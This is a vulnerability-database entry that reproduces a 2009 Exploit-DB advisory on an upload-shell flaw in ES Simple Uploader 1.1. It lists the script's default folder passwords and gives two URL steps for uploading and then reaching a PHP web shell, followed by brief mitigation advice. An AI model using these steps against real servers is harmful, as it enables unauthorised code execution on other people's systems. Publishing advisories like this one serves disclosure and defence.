ES Simple Uploader v 1.1 Upload Shell Vulnerability

vendor:

ES Simple Uploader

by:

indoushka

7.5

CVSS

HIGH

Upload Shell

434

CWE

Product Name: ES Simple Uploader

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:energyscripts:es_simple_uploader:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2009

ES Simple Uploader v 1.1 Upload Shell Vulnerability

ES Simple Uploader v 1.1 is vulnerable to an upload shell vulnerability. An attacker can exploit this vulnerability by uploading a malicious file to the uploads/images/ directory, which can be accessed via the URL http://server/script/uploads/images/Ev!l.php. The attacker can then execute arbitrary code on the server.

Mitigation:

The application should validate the file type before allowing it to be uploaded. The application should also restrict the types of files that can be uploaded.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : ES Simple Uploader v 1.1 Upload Shell Vulnerability                     |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : ES Simple Uploader v 1.1 (Powered by EnergyScripts) !talian Script      |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : Upload Shell                                                            | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| $upload_dirs = array(
|  "images" => array(
|      "dir"     =>"uploads/images/",
|      "name"    =>"Images folder",
|      "password"=>"images",
|  ),
|  "docs" => array(
|      "dir"     =>"uploads/docs/",
|      "name"    =>"Docs",
|      "password"=>"docs",
|  ),
|  "common" => array(
|      "dir"     =>"uploads/common/",
|      "name"    =>"Common files",
|     "password"=>"common",
| ),
| );
|
| 1- http://server/script/index.php * loockup 4 password
| 
| 2- http://server/script/uploads/images/Ev!l.php * 2find it
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------